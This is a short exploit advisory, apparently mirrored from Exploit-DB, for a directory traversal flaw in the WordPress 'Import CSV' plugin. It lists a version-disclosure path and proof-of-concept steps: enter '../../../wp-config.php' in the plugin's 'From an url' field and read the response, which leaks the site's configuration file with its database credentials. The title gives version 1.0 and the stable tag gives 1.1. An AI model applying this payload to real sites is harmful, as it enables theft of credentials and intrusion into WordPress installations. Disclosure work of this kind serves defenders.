WordPress Plugin Import CSV 1.0 – Directory Traversal

  • 作者: Wadeek
    日期: 2016-03-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39576/
  • # Exploit Title: WordPress Import CSV | Directory Traversal
    # Exploit Author: Wadeek
    # Website Author: https://github.com/Wad-Deek
    # Software Link: https://downloads.wordpress.org/plugin/xml-and-csv-import-in-article-content.zip
    # Stable Tag: 1.1
    # Tested on: Xampp on Windows7
     
    [Version Disclosure]
    ======================================
    /wp-content/plugins/xml-and-csv-import-in-article-content/readme.txt
    ======================================
     
    [PoC]
    ======================================
    Go to /wp-content/plugins/xml-and-csv-import-in-article-content/upload-process.php.
    Click on the link "From an url".
    In "URL" field to write "../../../wp-config.php".
    Validate form and inspect the body.
    ======================================